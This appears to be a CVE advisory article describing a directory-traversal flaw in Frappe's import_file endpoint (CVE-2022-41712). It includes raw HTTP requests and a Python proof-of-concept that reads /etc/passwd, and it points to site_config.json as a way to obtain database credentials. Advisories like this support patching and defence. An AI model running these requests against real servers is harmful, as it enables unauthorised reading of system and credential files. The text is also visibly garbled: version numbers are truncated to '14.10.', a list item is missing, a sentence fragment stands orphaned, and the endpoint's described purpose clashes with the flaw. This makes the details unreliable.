CVE CyberSecurity Database News

CVE-2022-41712 - How Frappe 14.10. Exposed Local Files Through import_file

Poster -

Frappe is the backend framework powering ERPNext and many business applications. In version 14.10., a critical vulnerability (CVE-2022-41712) was discovered that could let an attacker read arbitrary files from the server, simply by sending a crafted request.

In this article, we’ll explain what went wrong, how the exploit works, and how you can protect your system if you’re using Frappe.

Version Affected: v14.10. (and likely earlier)

- CVE: CVE-2022-41712

What’s The Problem?

Frappe has an endpoint for importing files. The import_file parameter is supposed to allow users to upload specific files _to_ the server for things like import/export features.

The trouble comes because Frappe doesn’t correctly validate the import_file parameter. That means attackers can trick the server into exposing any files they want — like /etc/passwd or sensitive credential files — by just crafting a special request.

The Exploit: Step by Step

Let’s look at how an attacker could exploit this flaw.

1. The Vulnerable Endpoint

In Frappe 14.10., you’ll find a route (typically something like /api/method/frappe.core.doctype.data_import.data_import.import_file) which expects a parameter called import_file.

Normally, a payload might look like

POST /api/method/frappe.core.doctype.data_import.data_import.import_file HTTP/1.1
Host: your-site.com
Content-Type: application/x-www-form-urlencoded

import_file=erpnext/customers.csv

But since the server does not sanitize this value, a hacker can change the value to point to any file stored on the server. For example:

POST /api/method/frappe.core.doctype.data_import.data_import.import_file HTTP/1.1
Host: your-site.com
Content-Type: application/x-www-form-urlencoded

import_file=../../../../../../etc/passwd

This kind of path (../../../../../../) is called directory traversal. It moves up directories to the root of the server and requests the file.

2. The Server Response

If the conditions are right, Frappe will read the file at that path and return its contents. So, /etc/passwd—a classic target for attackers—will be dumped in the HTTP response.

3. Proof of Concept (PoC)

Here’s how you might test this in Python, using the popular requests library.

import requests

target_url = "https://[your-frappe-domain]/api/method/frappe.core.doctype.data_import.data_import.import_file";

# Path to sensitive file (Unix example)
payload = {'import_file': '../../../../../../etc/passwd'}

response = requests.post(target_url, data=payload)

print(response.text)  # Should print the contents of /etc/passwd if vulnerable

Warning: Use this responsibly. Never attack systems you don't have permission to test.

Potentially grab API keys, encryption keys, or other sensitive files

This is the classic scenario for escalating attacks. Just reading site_config.json could give an attacker database credentials for the whole application.

The function behind import_file simply trusted whatever file path it was given, without

1. Checking if it was an allowed/expected filename

Using a whitelist directory

3. Sanitizing or rejecting paths with ../ in them

This risky coding practice is known as an improper input validation vulnerability.

The Frappe team eventually patched this issue by adding input validation. For the official fix, see

- Frappe Patch for CVE-2022-41712 (GitHub)

After the patch, the input is checked and sanitized, and only allowed filenames/paths can be used.

Full CVE Reference

- NVD – CVE-2022-41712
- Exploit-DB 51290

Update Frappe Immediately: Upgrade to the latest version in the 14.x or 15.x line.

- Restrict Access: Lock down API endpoints with authentication/authorization.
- Monitor Logs: Check for suspicious import_file requests, especially those with ../ or pointing to odd file paths.

Conclusion

Improper input validation for file paths can lead to severe vulnerabilities, like the one found in Frappe 14.10.. If you run any public Frappe installation, it’s critical to upgrade and review your exposure.

Stay safe, keep your frameworks up-to-date, and always treat user input as untrusted!

- Frappe Framework – Official GitHub
- Responsible Disclosure Guide – Frappe

Timeline

Published on: 11/25/2022 18:15:00 UTC
Last modified on: 11/30/2022 16:01:00 UTC